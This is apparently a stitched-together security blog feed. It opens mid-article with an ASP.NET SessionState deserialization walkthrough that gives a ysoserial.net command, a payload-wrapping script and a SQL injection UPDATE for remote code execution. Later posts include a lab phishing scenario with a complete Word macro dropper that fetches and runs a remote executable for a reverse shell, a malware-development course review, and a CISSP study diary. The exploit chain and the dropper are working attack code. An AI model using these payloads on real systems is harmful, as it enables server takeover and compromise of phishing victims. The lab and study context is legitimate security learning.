After reading the documentation, I learned that this database exists to store sessions for ASP.NET web applications. By default, sessions are stored in the ASP.NET application’s memory, but in some distributed architectures (for example, behind a load balancer) multiple identical copies of the ASP.NET application run on different servers, and a user’s requests will not always be routed to the same host. That requires a mechanism for sharing sessions across hosts, and storing them in SQL Server is one such solution. To enable it, add the following to web.config:

<configuration>
    <system.web>
        <!-- Store sessions in SQL Server. -->
        <sessionState
            mode="SQLServer"
            sqlConnectionString="data source=127.0.0.1;user id=<username>;password=<password>"
            timeout="20"
        />
        
        <!-- Default: store sessions in memory (in-process). -->
        <!-- <sessionState mode="InProc" timeout="20" /> -->
 
        <!-- Store sessions in the ASP.NET State Service,
             another cross-host session-sharing solution. -->
        <!--
        <sessionState
            mode="StateServer"
            stateConnectionString="tcpip=localhost:42424"
            timeout="20"
        />
        -->
    </system.web>
</configuration>

To create the ASPState database, you can use the built-in tool C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe with the following commands:

# Create the ASPState database
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssadd -sstype p

# Remove the ASPState database
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssremove -sstype p

Now that we know how the session storage location is configured, and we control the ASPState database, what can we do with it? That’s the point of this article’s title: achieve remote code execution!

ASP.NET lets us store objects in the session, for example a List object: Session["secret"] = new List<String>() { "secret string" };. To persist these objects to SQL Server it naturally uses a serialization mechanism, and since we control the database, we can also trigger arbitrary deserialization. To do so, we first need to understand how Session objects are serialized and deserialized.

A quick read through the code quickly pinpoints the classes that handle this process. To keep the explanation short, I’ll cut straight to what kind of deserialization happens on the data fetched from the database. The core is the SqlSessionStateStore.GetItem method, which restores the Session object. I’ve removed as much irrelevant code as possible, but it’s still rather long; if you don’t feel like reading code, just scroll on down XD

namespace System.Web.SessionState {
    internal class SqlSessionStateStore : SessionStateStoreProviderBase {
        public override SessionStateStoreData  GetItem(HttpContext context,
                                                        String id,
                                                        out bool locked,
                                                        out TimeSpan lockAge,
                                                        out object lockId,
                                                        out SessionStateActions actionFlags) {
            SessionIDManager.CheckIdLength(id, true /* throwOnFail */);
            return DoGet(context, id, false, out locked, out lockAge, out lockId, out actionFlags);
        }

        SessionStateStoreData DoGet(HttpContext context, String id, bool getExclusive,
                                        out bool locked,
                                        out TimeSpan lockAge,
                                        out object lockId,
                                        out SessionStateActions actionFlags) {
            SqlDataReader       reader;
            byte []             buf;
            MemoryStream        stream = null;
            SessionStateStoreData    item;
            SqlStateConnection  conn = null;
            SqlCommand          cmd = null;
            bool                usePooling = true;

            buf = null;
            reader = null;
            conn = GetConnection(id, ref usePooling);

            try {
                if (getExclusive) {
                    cmd = conn.TempGetExclusive;
                } else {
                    cmd = conn.TempGet;
                }

                cmd.Parameters[0].Value = id + _partitionInfo.AppSuffix; // @id
                cmd.Parameters[1].Value = Convert.DBNull;   // @itemShort
                cmd.Parameters[2].Value = Convert.DBNull;   // @locked
                cmd.Parameters[3].Value = Convert.DBNull;   // @lockDate or @lockAge
                cmd.Parameters[4].Value = Convert.DBNull;   // @lockCookie
                cmd.Parameters[5].Value = Convert.DBNull;   // @actionFlags

                using(reader = SqlExecuteReaderWithRetry(cmd, CommandBehavior.Default)) {
                    if (reader != null) {
                        try {
                            if (reader.Read()) {
                                buf = (byte[]) reader[0];
                            }
                        } catch(Exception e) {
                            ThrowSqlConnectionException(cmd.Connection, e);
                        }
                    }
                }

                if (buf == null) {
                    /* Get short item */
                    buf = (byte[]) cmd.Parameters[1].Value;
                }

                using(stream = new MemoryStream(buf)) {
                    item = SessionStateUtility.DeserializeStoreData(context, stream, s_configCompressionEnabled);
                    _rqOrigStreamLen = (int) stream.Position;
                }
                return item;
            } finally {
                DisposeOrReuseConnection(ref conn, usePooling);
            }
        }
        
        class SqlStateConnection : IDisposable {
            internal SqlCommand TempGet {
                get {
                    if (_cmdTempGet == null) {
                        _cmdTempGet = new SqlCommand("dbo.TempGetStateItem3", _sqlConnection);
                        _cmdTempGet.CommandType = CommandType.StoredProcedure;
                        _cmdTempGet.CommandTimeout = s_commandTimeout;
                        // ignore process of setting parameters
                    }
                    return _cmdTempGet;
                }
            }
        }
    }
}

We can clearly see from the code that it calls the ASPState.dbo.TempGetStateItem3 stored procedure to fetch the serialized session bytes into the buf variable, and finally passes buf to SessionStateUtility.DeserializeStoreData to deserialize and restore the Session object. The TempGetStateItem3 stored procedure is essentially equivalent to running SELECT SessionItemShort FROM [ASPState].dbo.ASPStateTempSessions, so we know the session is stored in the SessionItemShort column of the ASPStateTempSessions table. Next, let’s see what the crucial DeserializeStoreData does. Again, it runs long; scroll down if you need to XD

namespace System.Web.SessionState {
    public static class SessionStateUtility {

        [SecurityPermission(SecurityAction.Assert, SerializationFormatter = true)]
        internal static SessionStateStoreData Deserialize(HttpContext context, Stream stream) {
            int                 timeout;
            SessionStateItemCollection   sessionItems;
            bool                hasItems;
            bool                hasStaticObjects;
            HttpStaticObjectsCollection staticObjects;
            Byte                eof;

            try {
                BinaryReader reader = new BinaryReader(stream);
                timeout = reader.ReadInt32();
                hasItems = reader.ReadBoolean();
                hasStaticObjects = reader.ReadBoolean();

                if (hasItems) {
                    sessionItems = SessionStateItemCollection.Deserialize(reader);
                } else {
                    sessionItems = new SessionStateItemCollection();
                }

                if (hasStaticObjects) {
                    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);
                } else {
                    staticObjects = SessionStateUtility.GetSessionStaticObjects(context);
                }

                eof = reader.ReadByte();
                if (eof != 0xff) {
                    throw new HttpException(SR.GetString(SR.Invalid_session_state));
                }
            } catch (EndOfStreamException) {
                throw new HttpException(SR.GetString(SR.Invalid_session_state));
            }
            return new SessionStateStoreData(sessionItems, staticObjects, timeout);
        }
    
        static internal SessionStateStoreData DeserializeStoreData(HttpContext context, Stream stream, bool compressionEnabled) {
            return SessionStateUtility.Deserialize(context, stream);
        }
    }
}

We can see that DeserializeStoreData actually hands deserialization off to other classes: depending on the data read, it may delegate to SessionStateItemCollection.Deserialize or HttpStaticObjectsCollection.Deserialize. After examining the code, the handling in HttpStaticObjectsCollection is relatively simple, so I chose to follow that branch.

namespace System.Web {
    public sealed class HttpStaticObjectsCollection : ICollection {
        static public HttpStaticObjectsCollection Deserialize(BinaryReader reader) {
            int     count;
            string  name;
            string  typename;
            bool    hasInstance;
            Object  instance;
            HttpStaticObjectsEntry  entry;
            HttpStaticObjectsCollection col;

            col = new HttpStaticObjectsCollection();

            count = reader.ReadInt32();
            while (count-- > 0) {
                name = reader.ReadString();
                hasInstance = reader.ReadBoolean();
                if (hasInstance) {
                    instance = AltSerialization.ReadValueFromStream(reader);
                    entry = new HttpStaticObjectsEntry(name, instance, 0);
                }
                else {
                    // skipped
                }
                col._objects.Add(name, entry);
            }

            return col;
        }
    }
}

Digging in, we find that after HttpStaticObjectsCollection reads a few bytes, it hands processing off to AltSerialization.ReadValueFromStream. Readers who have followed this far may be thinking, “don’t tell me we have to dig into that too...”, but this is actually far enough, because AltSerialization is essentially a wrapper around BinaryFormatter, and we already have enough information to exploit it. There’s also a bonus: when I reached this point in the code and looked the class up, I found that ysoserial.net already has a plugin for building AltSerialization deserialization payloads, so we can pull out that weapon directly! The one-liner below generates a Base64-encoded payload that executes the system command calc.exe.

ysoserial.exe -p Altserialization -M HttpStaticObjectsCollection -o base64 -c "calc.exe"

There is still a small problem to solve, though. The payloads built by ysoserial.net’s AltSerialization plugin target the deserialization of the SessionStateItemCollection or HttpStaticObjectsCollection classes, whereas the serialized session data stored in the database is wrapped in one more layer by the SessionStateUtility class, so some massaging is required. Looking back at the code, SessionStateUtility only adds a few bytes, simplified as follows:

timeout = reader.ReadInt32();
hasItems = reader.ReadBoolean();
hasStaticObjects = reader.ReadBoolean();

if (hasStaticObjects)
    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);

eof = reader.ReadByte();

An Int32 adds 4 bytes and a Boolean adds 1 byte. Since the code path must enter the HttpStaticObjectsCollection branch, the 6th byte must be 1 for the condition to hold. First convert the payload produced by ysoserial.net from Base64 to hex, then prepend 6 bytes and append 1 byte, as shown below:

  timeout    false  true            HttpStaticObjectsCollection             eof
┌─────────┐  ┌┐     ┌┐    ┌───────────────────────────────────────────────┐ ┌┐
00 00 00 00  00     01    010000000001140001000000fff ... snip ... 0000000a0b ff

This massaged payload can now be used to attack the SessionStateUtility class!
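The wrapping is easy to script. Here’s a hedged Python sketch of the byte layout described above (the function name is mine, and fake_payload stands in for the Base64-decoded ysoserial.net output):

```python
import struct

def wrap_for_sessionstate(hsoc_payload: bytes, timeout: int = 20) -> bytes:
    """Wrap an HttpStaticObjectsCollection payload in the header/trailer
    bytes that SessionStateUtility's deserializer expects."""
    header = struct.pack("<i", timeout)  # 4-byte Int32 timeout
    header += b"\x00"                    # hasItems = false
    header += b"\x01"                    # hasStaticObjects = true -> take the branch
    return header + hsoc_payload + b"\xff"  # 0xff end-of-stream marker

# Stand-in for the decoded ysoserial.net HttpStaticObjectsCollection payload
fake_payload = bytes.fromhex("010000000001140001000000")
wrapped = wrap_for_sessionstate(fake_payload, timeout=0)
print(wrapped.hex())  # hex string to place after 0x in the UPDATE statement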

The final step is to use the SQL injection from the beginning to inject the malicious serialized content into the database. If an ASP.NET_SessionId cookie appears when browsing the target site normally, a corresponding session record already exists in the database, so we only need to execute a SQL UPDATE statement like the following:

?id=1; UPDATE ASPState.dbo.ASPStateTempSessions
       SET SessionItemShort = 0x{Hex_Encoded_Payload}
       WHERE SessionId LIKE '{ASP.NET_SessionId}%25'; --

Replace {ASP.NET_SessionId} with your own ASP.NET_SessionId cookie value and {Hex_Encoded_Payload} with the serialized payload prepared earlier.

What if there is no ASP.NET_SessionId? That means the target probably hasn’t stored anything in the session yet, so no record has been created in the database. In that case, we just force a cookie on it! An ASP.NET SessionId is 24 randomly generated characters from a custom character set. You can generate one with the Python script below, for example plxtfpabykouhu3grwv1j1qw, then browse any aspx page with Cookie: ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw, and in theory ASP.NET will automatically add a record to the database.

import random
chars = 'abcdefghijklmnopqrstuvwxyz012345'
print(''.join(random.choice(chars) for i in range(24)))

If still no record appears in the database, the only option is to hand-craft an INSERT statement to create one. As for how to construct it, a look at the code should make it easy, so I’ll leave that for you to play with :P

Once the payload has been injected, browse any aspx page again with the cookie ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw, and the deserialization will be triggered, executing arbitrary system commands!

As an aside, using SessionState deserialization to take control of an ASP.NET application’s host is not limited to the SQL injection scenario. In internal network penetration tests, a common situation is that various information leaks (e.g. an internal GitLab, arbitrary file reads) yield plenty of SQL Server accounts and passwords, but not the credentials for the Windows host running the target ASP.NET application. To reach the objective (control of the designated web host), we have used exactly this technique, so it is also a somewhat valuable and very interesting means of lateral movement. What other tricks and variations are possible is up to your continued imagination!

Free Cyber Materials BC Of Covid

11 April 2020 at 11:20

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on, and it wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others 👊🏼💯 Hats off to these organizations, since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe 📿🙏🏼

 

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you

The post Free Cyber Materials BC Of Covid appeared first on Certification Chronicles.

Pharm Raised Phish 😅🤠

31 March 2020 at 15:55

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch after a power outage, since sadly I hadn’t copied running-config to startup-config. Hanging off my switch is basically everything besides wireless: my ESXi lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLs and VLANs 🤣 It took me about a week to update (and save) the switch configuration, clean up my NAS, clean up all my machines & VMs, and destroy and rebuild my ESXi lab. Just like before, my ESXi lab simulates a corporate network: an Active Directory environment with an assortment of machines running various services. I use pfSense as a virtual firewall/router, which lets you simulate someone attacking over the WAN while your LAN is protected by a security device, just like normal. You can google security courses and CTFs to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful; we all have to spend the time to stand things up before we can even begin to think about playing around.


Keeping Busy:

I began to think about what I wanted to learn more about. I found an advanced penetration testing book focusing on adversary emulation and APTs that I fell in love with. It’s ironic, because the only reason this book stood out was that it was only 230 pages. I thought, damn, either this thing is complete garbage and captures .01% of something irrelevant that some other guy loved, or it’s chock full of gems. It was the latter! My head’s spinning as we write our own VBA dropper, which writes a VBS file to disk, which downloads the payload and executes a reverse shell. By the end of chapter one we’re writing our own C2 infrastructure using libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! The payloads and infrastructure progressively improve as the book goes on. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

  1. Somehow, through password reuse, you (the attacker) have gained access to an organization’s webmail login
  2. As a budding hacker you understand situational awareness. Your target is an IT administrator – who is probably already a little concerned about his job security, since through reconnaissance you’ve learned that 30% of the entire IT staff has been furloughed since the pandemic began.
  3. You craft a fake Word document that appears to be a notice of this month’s layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document – it’s a blurred image, and enabling macros begins and carries out the compromise. It looks like this



    Payload:

    Sub AutoOpen()

        Dim PayloadFile As Integer
        Dim FilePath As String

        FilePath = "C:\tmp\payload.vbs"
        PayloadFile = FreeFile

        ' Create the VBS dropper, write it to disk and execute it. The VBS reaches
        ' out to a remote server, downloads the payload and executes it.
        Open FilePath For Output As PayloadFile

        Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""
        Print #PayloadFile, ""
        Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"
        Print #PayloadFile, "    Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar, res, decoded_char"
        Print #PayloadFile, "    Const ForReading = 1, ForWriting = 2, ForAppending = 8"
        Print #PayloadFile, "    Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
        Print #PayloadFile, "    If objFSO.FolderExists(myPath) Then"
        Print #PayloadFile, "        strFile = objFSO.BuildPath(myPath, Mid(myURL, InStrRev(myURL, ""/"") + 1))"
        Print #PayloadFile, "    ElseIf objFSO.FolderExists(Left(myPath, InStrRev(myPath, ""\"") - 1)) Then"
        Print #PayloadFile, "        strFile = myPath"
        Print #PayloadFile, "    End If"
        Print #PayloadFile, ""
        Print #PayloadFile, "    Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
        Print #PayloadFile, "    Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
        Print #PayloadFile, "    objHTTP.Open ""GET"", myURL, False"
        Print #PayloadFile, "    objHTTP.Send"
        Print #PayloadFile, ""
        Print #PayloadFile, "    res = objHTTP.ResponseBody"
        Print #PayloadFile, "    For i = 1 To LenB(objHTTP.ResponseBody)"
        Print #PayloadFile, "        currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
        Print #PayloadFile, "        objFile.Write currentChar"
        Print #PayloadFile, "    Next"
        Print #PayloadFile, "    objFile.Close()"
        Print #PayloadFile, "    Set WshShell = WScript.CreateObject(""WScript.Shell"")"
        Print #PayloadFile, "    WshShell.Run ""C:\tmp\PAYLOAD.EXE"""
        Print #PayloadFile, "End Sub"

        Close PayloadFile

        ' Launch the dropper we just wrote to disk
        Shell "wscript c:\tmp\payload.vbs"

    End Sub


  4. The administrator anxiously opens the email, the macro detonates, the payload executes, and you get your reverse shell.

Now that we have a way to execute payloads, it’s on to converting the payload into a C2 implant and standing up the infrastructure! Here’s a video of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.


A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

24 March 2020 at 15:20

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

Introduction

I recently discovered the Sektor7 RED TEAM Operator: Malware Development Essentials course on 0x00sec and it instantly grabbed my interest. Lately I’ve been working on improving my programming skills, especially in C, on Windows, and in the context of red teaming. This course checked all those boxes, and was on sale for $95 to boot. So I broke out the credit card and purchased the course.

Custom code can be a huge benefit during pentesting and red team operations, and I’ve been trying to level up in that area. I’m a pentester by trade, with a little red teaming thrown in, so this course was right in my wheelhouse. My C is slightly rusty, not having done much with it since college, and almost exclusively on Linux rather than Windows. I wasn’t sure how prepared I would be for the course, but I was willing to try harder and do as much research as I needed to get through it.

Course Overview

The course description reads like this:

It will teach you how to develop your own custom malware for latest Microsoft Windows 10. And by custom malware we mean building a dropper for any payload you want (Metasploit meterpreter, Empire or Cobalt Strike beacons, etc.), injecting your shellcodes into remote processes, creating trojan horses (backdooring existing software) and bypassing Windows Defender AV.

It’s aimed at pentesters, red teamers, and blue teamers wanting to learn the details of offensive malware. It covers a range of topics aimed at developing and delivering a payload via a dropper file, using a variety of mechanisms to encrypt, encode, or obfuscate different elements of the executable. From the course page the topics include:

  • What is malware development
  • What is PE file structure
  • Where to store your payload inside PE
  • How to encode and encrypt payloads
  • How and why obfuscate function calls
  • How to backdoor programs
  • How to inject your code into remote processes

RTO: Malware Development Essentials covers the above with 9 different modules, starting with the basics of the PE file structure, ending with combining all the techniques taught to create a dropper executable that evades Windows Defender while injecting a shellcode payload into another process.

The course is delivered via a content platform called Podia, which allows streaming of the course videos and access to code samples and the included pre-configured Windows virtual machine for compiling and testing code. Podia worked quite well, and the provided code was clear, comprehensive, well-commented, and designed to be reusable later to create your own executables.

Module 1: Intro and Setup

The intro and setup module covers a quick intro to the course and getting access to the excellent sample code and a virtual machine OVA image that contains a development environment, debugger, and tools like PEBear. I really like that the VM was provided, as it made jumping in and following along effortless, as well as saving time creating a development environment.

Module 2: Portable Executable

This module covers the Portable Executable (PE) format, how it is structured, and where things like code and data reside within it. It introduces PEBear, a tool for exploring PE files I’d not used before. It also covers the differences between executables and DLLs on Windows.

Module 3: Droppers

The dropper module covers how and where to store payload shellcode within a PE, using the .text, .data, and .rsrc sections. It also covers including external resources and compiling them into the final .exe.

Module 4: Obfuscation and Hiding

Obfuscation and hiding was one of my favorite modules. Anyone that has had their shellcode or implants caught will appreciate knowing how to use AES and XOR to encrypt payloads, and how to dynamically decrypt them at runtime to prevent static analysis. I also learned a lot about Windows and the Windows API through the sections on dynamically resolving functions and function call obfuscation.

Module 5: Backdoors and Trojans

This section covered code caves, hiding data within a PE, and how to backdoor an existing executable with a payload. The x64dbg debugger is used extensively to examine a binary, find space for a payload, and ensure that the existing binary still functions normally. Already knowing assembly helped me here, but it’s explained well enough for those with little to no assembly knowledge to follow along.

Module 6: Code Injection

I learned a ton from this section, and it really clarified my knowledge of process injection, including within a process, between processes, and using a DLL. VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are more than just some function names involving process injection to me now.

Module 7: Extras

This module covered the differences between GUI and console programs on Windows, and how to ensure the dreaded black console window does not appear when your payload is executed.

Module 8: Combined Project

This was the culmination of the course, where you are walked through combining all the individual techniques and tools you learned throughout the course into a single executable. I suggest watching it and then doing it yourself independently to really internalize the material.

Module 9: Assignment

The last module is an assignment, which asks you to take what you’ve learned in the combined project and more fully implement some of the techniques, as well as providing some suggestions for real-world applications of the course content you can try by yourself.

Takeaways

I learned a heck of a lot from this course. It was not particularly long, but it covered the topics thoroughly and gave me a good base to build from. I can’t remember a course where I learned so much in so little time. Not only did I learn what was intended by the course, but there were a lot of ancillary things I picked up along the way that weren’t explicitly covered.

C on Windows

I found the course to be a good introduction to C on Windows, assuming you are already familiar with C. It’s not a beginning C programming course by any means. Most of my experience with C has been on Linux with gcc, and the course provided practical examples of how to write C on Windows, how to use MSDN effectively, how to structure programs, and how to interact with DLLs. I was familiar with many of the topics at a high level, but there’s no substitute for digging in and writing code.

Intro to the Windows API

I also learned a great deal on how the Windows API works and how to interact with it. The section on resolving functions manually was especially good. I have a much stronger grasp of how Windows presents different functionalities, and how to lookup functions and APIs on MSDN to incorporate them into my own code.

Making Windows Concepts Concrete

As mentioned above, there were a lot of areas I knew about at a high level, like process injection, DLLs, the Import Address Table, even some Windows APIs like WriteProcessMemory and CreateRemoteThread. But once I looked up their function signatures on MSDN, called them myself, created my own DLLs, and obfuscated the IAT, I had a much more concrete understanding of each topic, and I feel much more prepared to write my own tools in the future using what I’ve learned.

A Framework For Building Your Own Payloads

The way the course built from small functions and examples, all meant to be reused and built upon, really made the course worthwhile and feel like an investment I could take advantage of later in my own tools. I’ve already managed to craft a dropper that executes a staged Cobalt Strike payload that evades Windows Defender. How’s that for a practical hands-on course?

No Certification Exam

The course is not preparation for or in any way associated with a certification exam, which in this case I think is a good thing. The course presents fundamental knowledge that is immensely useful in offensive security, and I think it’s best learned for its own sake rather than to add more letters after your name. I like certifications in general and have several, but I found myself not worried about covering the material for an exam and enjoyed learning the material and thinking of practical applications of it at work and in CTFs, Hack The Box, etc. instead. It’s a nice feeling.

Conclusion

I loved this course, and reenz0h is a phenomenal instructor. If it’s not been obvious so far, I’ve gained a lot of fascinating and practical knowledge that will be useful far into the future. My recommendation: take this course if you can. It’s affordable, not an excessive time commitment, and worth every second and penny you spend on it. And just in case my enthusiasm comes across as excessive or shilling, I have no association with Sektor7, their employees, or the authors of the course. Just a happy pentester with some new skills.

Slayed CISSP

15 March 2020 at 23:03

I saw this day countless times in the last two months. Typing this blog post after passing the exam is a surreal feeling. Forecasting a goal, envisioning its completion, and driving it home is the stuff fairy-tales are made of. How does the air smell at that moment? What does it taste like? Why do I deserve it? How would all the countless hours of study I was willing to endure eventually lead to pay-dirt and, once again, me on top! Triumphant. How relieved would I be? How much elation would I be feeling? Like having a superpower to force anything I want into existence. Gotta have that vision!

I’ll get to what studying looked and felt like, exam review dialogue, and such soon. Yes! This post is LONG. But guess what, I’m the one who had to write it. I didn’t do it for myself, I did it for you. The length was dictated by however many words I needed to produce a post with the context of what I would have wanted in hindsight after passing the exam. Most of the blogs I see are humble brags from people looking for everyone to kiss their feet since they passed it. Some are really good, like the ones at the end of the post. Some are long and list out key things you should be on the lookout for, like CMMI or BCP, without any other context. They continue by saying how it was the MOST difficult test of their life and how they felt like they were going to fail when the test ended. I just don’t think this is or has to be the typical case. Anyone can pass CISSP – keep reading and I’ll detail how to study and why most of the practice materials are broken. You can extrapolate something out of that too (if you only use the recommended study materials you will fail).

The point needs to be restated that I think the journey is the most valuable portion of attempting certifications, not the actual cert. This one, for instance, proves you are not only familiar with all the content from the 8 domains but also able to synthesize and apply it to scenario-based situations using sound risk management principles, acting as an Information Security Manager. Not only do I want to provide a valuable resource for exam preparation, I also want to give you insight and texture into my life during the entire process.

Part-1: What’s My Motivation?

Time: Late December 2019

Self-introspection (self-observation) – is important as it’s a kind of regular check on self-development which helps you know what you have achieved so far.

I was promoted in December 2019 to Application Security Manager 😛 (for context). Christmas is a really special time in the Caribbean so I try to be there every year during that holiday period. (That’s how you end the year baby 👊🏽) So literally the next day after getting home from the trip (still having a week off before I go back to work) I start to get the feeling. Anybody know what I’m talking bout? The thirst? Watch TV for maybe a few hours, go out a day, chill, then it’s like “What am I doing with my life? What’s all this idle time I have? How do normal people do nothing for most of their lives?” Happens to me every time 💯

I had preconceived thoughts about CISSP honestly. “It’s typical to fail on the first try” … “It’s a management exam” … “It’s an inch deep, mile wide” … “Reddit horror stories” … “Folks literally studying 6 months on average, some a year”. After doing some research I decided it was the one for me. Not only would it give some sort of legitimacy to my new position, it would, in addition, significantly broaden my understanding of Information Security and Risk Management.

I ordered the following study materials the same day based on research from the CISSP sub-reddit:

Major S/O to that sub, it’s a trove of information! That’s part of why I blog: to keep this process continually flowing and provide helpful materials to those after you. We have to realize 90% of the time we’re acting as consumers, not producers. I think it takes a certain level of appreciation for the field overall to be devoted to giving back in whatever form you can. We all have something we can contribute ‼

Life happened and I wasn’t able to start studying immediately. Shame because I got a free same-day delivery of the books. I never even opened the package when it came. Put it in my office and it sat there for most of January.

Part-2: What Was The Preparation Like?

Time: End of January 2020

Thinking about sports, and basketball in particular – how many free throws might an average player shoot per day when trying to improve their percentage? 50 free throws per day? 100? 500? That number may in actuality be well around 2 thousand or more. Now let’s abstract that a little and dumb it down for a second. It’s not going to be anything novel. You need to consistently be shooting your free throws. In this case it’s all the practicing, reading all the materials from different sources, doing more practice questions, flashcards – it’s all a part of the process. You can’t go a weekend without studying, or even a day. Consistently & repeatedly!

You guys know by now, there’s nothing special about me. I just feel like when I really want something there’s an insatiable thirst to quench, borderline obsession maybe, until I get it. I guess what I’m trying to say is I know how to “Lock In”. I literally had hundreds of unanswered LinkedIn messages, DMs, texts, everything. I cut everybody off and focused on the task at hand. It would need my utmost attention at all times. There’s absolutely no going out, minimal TV; if I’m commuting I’m reading, if I’m on break I’m reading or researching; when I get home I’m getting settled at say 5 pm and then grinding till I’m dozing off. In bed I’m reading. When I wake up, before I get out of bed, I’m reading. Around this time is when you realize you could live with someone and be a complete stranger to them in the same house 😂 So some of the attributes that describe someone in this stage are consistency, dedication, resolve, discipline, resiliency.

You have to REALLY want it. When you do, you are laser-focused. As random as this is, I see myself in my head as I’m typing this as a heat-seeking missile. I’m coming in hot and I will not miss! I care about accuracy and precision. You get the picture. Whatever it means to you – “Lock In” – that’s the mode you need to be in, keeping in mind it’s a marathon not a sprint. Life will happen and some days you’ll be much more motivated than others – but anything in your control better be related to CISSP.

  • Sybex Official Study Guide 8th Edition (8/10) – This behemoth took me about 2 weeks to finish. I didn’t read it intently; it was more skimming and identifying what I absolutely didn’t know, or whether I knew something that was right for the wrong reason. You can register the Sybex book along with the practice tests on the Wiley test bank, which lets you take the chapter questions in an exam atmosphere instead of writing in the book, as well as practice exams. All your work is tracked and saved. After I finished reading the book I registered it and proceeded to go through each domain’s chapter questions. I would say my average was in the 60s for most of them. Bunch of new material; there’s definitely a vast amount of knowledge you need for every single domain. I was familiar with the SDLC / Security Testing / IR domains from work-related experience. Gets two dings for being so damn big. Very useful, but again it’s not something you can use alone to pass the exam despite it being the “Official Study Guide” 🤔
  • Kelly Handerhan’s videos (9/10) – Sadly these aren’t free anymore 😥 She really does an amazing job of relaying complex topics in an easily digestible manner. She also gives you the 2nd half of what you need to pass: the mindset. Even with the recent price change I still think this is worth however much it costs. You won’t read one Reddit or ISC2 post that doesn’t mention her. Gets a ding since you can’t pass the exam with this alone. I scored low on my first Sybex practice test after her videos, so I spot-checked which domains I was coming up short in and went back to read them in the Sybex book again.
  • Boson Test Engine (8/10) – One of the most valuable resources. Great bank of test questions with amazing, well-written, thorough explanations. The secret sauce here: whether or not you get an answer correct, you read the explanation. You’re confirming whether you were right for the wrong reason, or why you were wrong, or in what scenario one of the other answers could possibly be right. That’s the beauty of Boson. This helps you identify where you’re weak. Guess what you do after? You use the book or another source (tons of material out there) to better understand whatever it is. The reason Boson gets 2 dings is that the beauty is in the explanations, not necessarily the questions, which in hindsight are way too technical – reminiscent of all the study-material tests.
  • It’s now about mid-February and a blessing falls from the sky directly into my lap. I find my MOST valuable resource.
  • Discord CISSP Server (12/10) – This type of forum was perfect for most of my learning when tackling technical certs, so I knew it would push me here. Everyone is equally amazing, but there’s some unmatched wisdom in there for sure! This drastically improved the amount of information I retained as well as the depth of that information. I think this is the case because you’re not just you, in your head, alone in your room with a book. You’re now defending your argument on a particular question, or understanding why you’re wrong, and this goes on 24/7 since the group is global. 4 pm EST or 4 am, there are ALWAYS active discussions going on. There’s a psychological aspect to this as well. Feeling like you’re alone in a fight is depressing. Having an active army of mission-oriented soldiers all ready to fight, defend and operate 🔫?! Oh now this is a whole different story! Don’t underestimate the power of a topic being explained to you by a person instead of a blog post. I’ll forever be a part of this channel – definitely my new brothers and sisters. Blame most of me passing on them!
  • I started to do a million practice questions from anything I could find: books, practice sites, old materials. I guesstimate I did over six thousand practice questions. I can remember off-hand doing 1300 in a 2-day stretch 🧾 At this point I’m at about 5 hrs a day on weekdays and at least 12+ hrs on weekends #overdrive
  • Sari Greene’s CISSP course (9/10) – Decided to change the pace a little bit. This was awesome and very helpful, the most important thing being that she delivers the material with a strong risk management undertone. Another plus was how she aligned the entire course to the sections in the CISSP domain outline. Gets a ding since the material is about 5 years old, so it misses newer information on some topics, like IoT, SCADA, and embedded devices. Recommended.
  • Mike Chapple’s LinkedIn Learning CISSP course (9/10) – Very good! The course is taught in a way that isn’t typical of what you’d expect in a CISSP course. The way he provides practical realizations of the topics to seal them in is incredible. You can remember PGP until the cows come home, get hit with a question, and only know that PGP stands for Pretty Good Privacy 😂 Memorization won’t help you in the exam. He shows you real-life implementations of the exam topics. Wonderful course.
  • After I finished all those, I started from domain one and did the following for all 8 domains:
    • Read the Sybex chapter summary
    • Read the 11th Hour chapter summary
    • Watch Sari’s domain summary
    • Do Mike Chapple’s practice questions for the associated domain
  • We’re at about 2 weeks out now, time-wise. I started to read all the NIST documents related to the major processes in the various domains. These were actually well written and I learned to love them. Every night I would open them and try to relate everything I was doing back to risk management. I’m still doing practice problems, but maybe like 10 a day at this point. Most of my time is spent trying to understand the SDLC in depth, the IR process in depth, the BCP/DR process in depth. You not only need to understand the order of the processes but all the details & outputs that come from each.
  • (Maybe one month before, 2 members of the squad from Discord and I discovered we all had the same exam date.) The day before the exam I get hit up to join a conference call with both of them to do some last-day studying. Without this I wouldn’t have passed. We spent 10 hours going over all the major processes, ironing out our understandings and tying everything back to the RMF. It’s 10 pm the night before the exam and boy, I’m thinking I probably shouldn’t have done all that studying today for fear of cramming and losing it. I’m also pissed at myself for drinking a Red Bull 30 minutes earlier, because I should be sleeping, but an hour has gone by and I’m still wide awake – I hope I get to sleep soon for fear of not getting good rest and failing.

